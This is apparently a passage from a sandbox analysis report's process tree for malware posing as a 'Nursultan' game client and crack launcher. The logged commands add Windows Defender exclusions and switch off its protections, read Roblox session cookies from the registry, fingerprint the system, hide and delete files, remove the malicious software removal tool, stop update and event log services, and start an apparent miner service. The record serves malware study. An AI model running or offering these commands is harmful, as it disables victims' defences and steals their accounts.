        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        18⤵
        Executes dropped EXE
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        18⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        18⤵
        Executes dropped EXE
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        18⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1600
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        19⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        18⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        19⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        19⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2400
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        20⤵
        Views/modifies file attributes
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:2284
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:2108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:1848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        
        PID:3012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        20⤵
        
        PID:1960
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        Runs ping.exe
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        19⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        19⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1672
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        20⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        19⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        20⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        20⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:332
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        21⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        21⤵
        
        PID:3000
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        22⤵
        Drops file in Windows directory
        
        PID:2660
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        21⤵
        Launches sc.exe
        
        PID:2012
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        21⤵
        Launches sc.exe
        
        PID:1184
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        21⤵
        Launches sc.exe
        
        PID:2928
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        21⤵
        
        PID:484
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        21⤵
        Launches sc.exe
        
        PID:320
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        21⤵
        Power Settings
        
        PID:2092
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        21⤵
        Power Settings
        
        PID:1288
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        21⤵
        Power Settings
        
        PID:2388
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        21⤵
        Power Settings
        
        PID:1620
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        21⤵
        
        PID:2212
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        21⤵
        Launches sc.exe
        
        PID:804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        20⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        20⤵
        Executes dropped EXE
        
        PID:656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        20⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        20⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        21⤵
        
        PID:2564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        21⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        20⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        21⤵
        Executes dropped EXE
        
        PID:1684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        21⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1804
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        22⤵
        Views/modifies file attributes
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:1520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:2404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:2292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        
        PID:1976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:2464
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        22⤵
        
        PID:868
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        Runs ping.exe
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        21⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1080
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        22⤵
        
        PID:484
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        21⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        22⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        22⤵
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        22⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        22⤵
        
        PID:344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        22⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        22⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1928
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        23⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        22⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:380
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        23⤵
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        23⤵
        Drops file in Drivers directory
        
        PID:1124
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        24⤵
        Views/modifies file attributes
        
        PID:2732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:2452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:2912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:1632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:1504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        
        PID:2564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        24⤵
        
        PID:2608
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        Runs ping.exe
        
        PID:1280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        23⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        23⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2008
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        24⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        23⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        24⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        24⤵
        
        PID:1996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        24⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        24⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        24⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        24⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2688
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        25⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        24⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        25⤵
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        25⤵
        Drops file in Drivers directory
        
        PID:2508
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        26⤵
        Views/modifies file attributes
        
        PID:1908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:2244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:676
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:2600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        
        PID:2008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:2388
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        26⤵
        
        PID:2256
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        Runs ping.exe
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        25⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        25⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        26⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        25⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        26⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        26⤵
        Drops file in System32 directory
        
        PID:332
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        27⤵
        Drops file in System32 directory
        
        PID:2756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        27⤵
        
        PID:2664
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        28⤵
        Drops file in Windows directory
        
        PID:824
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        27⤵
        Launches sc.exe
        
        PID:3064
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        27⤵
        Launches sc.exe
        
        PID:1100
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        27⤵
        Launches sc.exe
        
        PID:1288
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        27⤵
        Launches sc.exe
        
        PID:3056
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        27⤵
        Launches sc.exe
        
        PID:2876
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        27⤵
        Power Settings
        
        PID:2912
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        27⤵
        Power Settings
        
